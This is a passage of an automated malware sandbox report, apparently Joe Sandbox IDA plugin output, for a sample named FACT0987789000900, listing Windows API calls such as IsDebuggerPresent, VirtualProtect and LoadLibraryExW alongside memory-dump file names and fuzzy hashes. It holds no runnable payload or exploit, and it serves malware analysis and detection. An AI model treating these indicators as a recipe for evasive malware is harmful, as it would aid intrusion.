                                                                                                                • CloseHandle.KERNEL32(00000000,?,004DC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004DC70F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseCreateHandleTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 3397143404-0
                                                                                                                • Opcode ID: f4ab48da5113b350943d3b6ab7b228d21659ae5692a865a010261a4465add287
                                                                                                                • Instruction ID: 5db455d213d38412d93185cd73c26abce7e7ecfd0f1ce45c15a073e1791b445a
                                                                                                                • Opcode Fuzzy Hash: f4ab48da5113b350943d3b6ab7b228d21659ae5692a865a010261a4465add287
                                                                                                                • Instruction Fuzzy Hash: F1E08632180214B7DB211B54AC09FCA7B68AB15760F108111FB24691E0D7B12555D7A8
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 004DBB72
                                                                                                                  • Part of subcall function 004B1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,004B7A85), ref: 004B1CB1
                                                                                                                  • Part of subcall function 004B1C9D: GetLastError.KERNEL32(00000000,?,004B7A85), ref: 004B1CC3
                                                                                                                • _free.LIBCMT ref: 004DBB83
                                                                                                                • _free.LIBCMT ref: 004DBB95
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: 39668004364d473340041393840801021218cf000de486f58b9632bd51e5be2b
                                                                                                                • Instruction ID: 17c08d1dba21ea0c35669d443b0c7316544f1095a21cbe164255a814454cbadc
                                                                                                                • Opcode Fuzzy Hash: 39668004364d473340041393840801021218cf000de486f58b9632bd51e5be2b
                                                                                                                • Instruction Fuzzy Hash: E5E0C2A120070082CB20693A6E64EF317DC8F04391704080FB459E3342CF2CF84088FC
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004922A4: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00492303
                                                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 004925A1
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00492618
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0050503A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                                                                                • String ID:
                                                                                                                • API String ID: 458326420-0
                                                                                                                • Opcode ID: 234d104d8a2f2d764da8e4a2553adb9ad477f76ec38c1999e412898ad1b7d630
                                                                                                                • Instruction ID: 1d91e88a66744747f35e2477c4b42c7835dc8882a04e51c1a33e9d24961b932d
                                                                                                                • Opcode Fuzzy Hash: 234d104d8a2f2d764da8e4a2553adb9ad477f76ec38c1999e412898ad1b7d630
                                                                                                                • Instruction Fuzzy Hash: DB71CFB8901B419ACB04EF6BA9B0699BFE4B778346B81466ED009C7771DB74480CEF1D
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __fread_nolock
                                                                                                                • String ID: EA06
                                                                                                                • API String ID: 2638373210-3962188686
                                                                                                                • Opcode ID: e243572e48be38f5961eb81d560dcf66b3270130f7376f4384b515887a79e528
                                                                                                                • Instruction ID: b97fcaed2544103b42f9105dec0a08c679ab74b9423e4c18f38fa931a677137e
                                                                                                                • Opcode Fuzzy Hash: e243572e48be38f5961eb81d560dcf66b3270130f7376f4384b515887a79e528
                                                                                                                • Instruction Fuzzy Hash: 7501F9719042187EDB18CB99C816FEE7BF8DB15305F00415FF152D2281E578A7048B60
                                                                                                                APIs
                                                                                                                • 74E4C8D0.UXTHEME ref: 00493A73
                                                                                                                  • Part of subcall function 004B1405: __lock.LIBCMT ref: 004B140B
                                                                                                                  • Part of subcall function 00493ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00493AF3
                                                                                                                  • Part of subcall function 00493ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00493B08
                                                                                                                  • Part of subcall function 00493D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00493AA3,?), ref: 00493D45
                                                                                                                  • Part of subcall function 00493D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00493AA3,?), ref: 00493D57
                                                                                                                  • Part of subcall function 00493D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00551148,00551130,?,?,?,?,00493AA3,?), ref: 00493DC8
                                                                                                                  • Part of subcall function 00493D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00493AA3,?), ref: 00493E48
                                                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00493AB3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3809921791-0
                                                                                                                • Opcode ID: 455075a514d02e5475edc8bb5b57d11c20b61e7362135b392c298e670ff11252
                                                                                                                • Instruction ID: 1dfdd195e62d77508159901fc3634e97d302e4791414a35a9bff24c4b63b2216
                                                                                                                • Opcode Fuzzy Hash: 455075a514d02e5475edc8bb5b57d11c20b61e7362135b392c298e670ff11252
                                                                                                                • Instruction Fuzzy Hash: 4C11C0715043409BC300EF2AED59A0EBFE8EBA5325F00891FF484872B1DBB49549DB9A
                                                                                                                APIs
                                                                                                                • ___lock_fhandle.LIBCMT ref: 004BEA29
                                                                                                                • __close_nolock.LIBCMT ref: 004BEA42
                                                                                                                  • Part of subcall function 004B7BDA: __getptd_noexit.LIBCMT ref: 004B7BDA
                                                                                                                  • Part of subcall function 004B7C0E: __getptd_noexit.LIBCMT ref: 004B7C0E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1046115767-0
                                                                                                                • Opcode ID: 506c10bc79eb3ef411a812e6ee00747d544706980fd6776ec4da21120bc9b538
                                                                                                                • Instruction ID: ae306926382f094273cbf2b1fbda737cd24962ed18ea68297aa9af09e9f1b0ca
                                                                                                                • Opcode Fuzzy Hash: 506c10bc79eb3ef411a812e6ee00747d544706980fd6776ec4da21120bc9b538
                                                                                                                • Instruction Fuzzy Hash: 6111C6724096108ED711BF66C8413D93A656FD633AF26434AE4241F1E2C7BC98019BBD
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __lock_file_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 26237723-0
                                                                                                                • Opcode ID: 5fa95a8089dfdb9825c4cb682f59f4abdbe41b0ccd84d437c57606874876d3ea
                                                                                                                • Instruction ID: a62b8758228d210f42987fdacfb5e6d9e219de46b377057a728018e2fd930610
                                                                                                                • Opcode Fuzzy Hash: 5fa95a8089dfdb9825c4cb682f59f4abdbe41b0ccd84d437c57606874876d3ea
                                                                                                                • Instruction Fuzzy Hash: 19012571800209AACF21BFA78C015DF7BA1AF80755F15411FF41456261D7798761DBBA
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004B7C0E: __getptd_noexit.LIBCMT ref: 004B7C0E
                                                                                                                • __lock_file.LIBCMT ref: 004B3629
                                                                                                                  • Part of subcall function 004B4E1C: __lock.LIBCMT ref: 004B4E3F
                                                                                                                • __fclose_nolock.LIBCMT ref: 004B3634
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                • String ID:
                                                                                                                • API String ID: 2800547568-0
                                                                                                                • Opcode ID: e1ac41ba1444c215b2bdf35690599be7ceb75c1390d9f000af49515706794ef0
                                                                                                                • Instruction ID: af60769214fb770ff40127b0d44fe1e08377c4474965c6894a48a82630295ae9
                                                                                                                • Opcode Fuzzy Hash: e1ac41ba1444c215b2bdf35690599be7ceb75c1390d9f000af49515706794ef0
                                                                                                                • Instruction Fuzzy Hash: 99F0BB31841604AADB21BF7788027DE7BA06F41339F26810FE410AB2C1C77C9A119F7D
                                                                                                                APIs
                                                                                                                  • Part of subcall function 01347450: GetFileAttributesW.KERNELBASE(?), ref: 0134745B
                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000), ref: 01347D45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1300511747.0000000001346000.00000040.00000020.00020000.00000000.sdmp, Offset: 01346000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1346000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesCreateDirectoryFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3401506121-0
                                                                                                                • Opcode ID: 0fb07f036fa685caa8c61150f1284e9020a13249e71a45f7c6cd1a95ba69e007
                                                                                                                • Instruction ID: 6d71c2e83bb91f650688238d59fc7d258fea09deb5a9b8dfc878adbe9c8a320c
                                                                                                                • Opcode Fuzzy Hash: 0fb07f036fa685caa8c61150f1284e9020a13249e71a45f7c6cd1a95ba69e007
                                                                                                                • Instruction Fuzzy Hash: 7E518D31A1020997EF14DFA4D844BEF737AEF58700F00456DE60DE7290EB76AA84CBA5
                                                                                                                APIs
                                                                                                                • __flush.LIBCMT ref: 004B2A0B
                                                                                                                  • Part of subcall function 004B7C0E: __getptd_noexit.LIBCMT ref: 004B7C0E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __flush__getptd_noexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 4101623367-0
                                                                                                                • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                                                • Instruction ID: 599d5014eb1af8619cd47dd96df528ef0ab0dfff3180c8577fc1f31cfc4e119c
                                                                                                                • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                                                • Instruction Fuzzy Hash: B041C9707007069FDF288EA9C6905EF77A6AF49350F14852FE459CB240D7F8DD418B68
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                • Instruction ID: dc733911cb3c2171221dbcfc1bdc03b725792a15c478eacaf5702018818ccbbf
                                                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                • Instruction Fuzzy Hash: 1631FC74A00106DFC718DF1AC480969F7B6FFAA340B6486A6E419CB355DB34EDC1CB95
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1473721057-0
                                                                                                                • Opcode ID: 55793b45794f8fa889aa56f99e724254f9fd939a56fec658de9635469a7f7ae6
                                                                                                                • Instruction ID: 98ae9a4e367a0e7cc41ee8b99792afd006895a9abd05c6b5b2e27031ca920c13
                                                                                                                • Opcode Fuzzy Hash: 55793b45794f8fa889aa56f99e724254f9fd939a56fec658de9635469a7f7ae6
                                                                                                                • Instruction Fuzzy Hash: A3416D705086118FDB24CF19C444B1ABBE0BF96318F1989ADE9964B362C37AF846CF56
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __getptd_noexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 3074181302-0
                                                                                                                • Opcode ID: f3fc7dddd7a3abf91cc7766ebea9f47ee10b1b3a2077af9536ea3396221e306a
                                                                                                                • Instruction ID: 79c2e8d17d5f0e16997b5aefac43b18801169c9b97b93e7c7e84c2f9e6b561fb
                                                                                                                • Opcode Fuzzy Hash: f3fc7dddd7a3abf91cc7766ebea9f47ee10b1b3a2077af9536ea3396221e306a
                                                                                                                • Instruction Fuzzy Hash: D12162728086018FD7117F76CC467D93A656FD233AF26464AE4244B1E2DBBC98019BBA
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00494214: FreeLibrary.KERNEL32(00000000,?), ref: 00494247
                                                                                                                • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004939FE,?,00000001), ref: 004941DB
                                                                                                                  • Part of subcall function 00494291: FreeLibrary.KERNEL32(00000000), ref: 004942C4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$Free$Load
                                                                                                                • String ID:
                                                                                                                • API String ID: 2391024519-0
                                                                                                                • Opcode ID: 8c5ade79aa01310410dd4fd663d4cd7fd7484a3324d1beb1dabec80209446f5a
                                                                                                                • Instruction ID: c2c75520b7d8d84ec77d9b2f0882d418e07beea9055ad948ff9c1aba2b285faf
                                                                                                                • Opcode Fuzzy Hash: 8c5ade79aa01310410dd4fd663d4cd7fd7484a3324d1beb1dabec80209446f5a
                                                                                                                • Instruction Fuzzy Hash: 1111EB31600206AACF10AB71DD06F9E7FE5AF80748F10843EF956A61C1DA789A029B68
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1473721057-0
                                                                                                                • Opcode ID: b3ceda470afcae06bacf30c0be59dea383eb76a3b78a003a25991b44165e4267
                                                                                                                • Instruction ID: c1d3c5d2ec78026f90c84576bcc064e8a26a6720afbc33b3118fdeb6beb87a31
                                                                                                                • Opcode Fuzzy Hash: b3ceda470afcae06bacf30c0be59dea383eb76a3b78a003a25991b44165e4267
                                                                                                                • Instruction Fuzzy Hash: 952166705082018FDB24DF65C444A1ABBE0BF9A304F14496EE59647362C33AF845CF56
                                                                                                                APIs
                                                                                                                • ___lock_fhandle.LIBCMT ref: 004BAFC0
                                                                                                                  • Part of subcall function 004B7BDA: __getptd_noexit.LIBCMT ref: 004B7BDA
                                                                                                                  • Part of subcall function 004B7C0E: __getptd_noexit.LIBCMT ref: 004B7C0E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
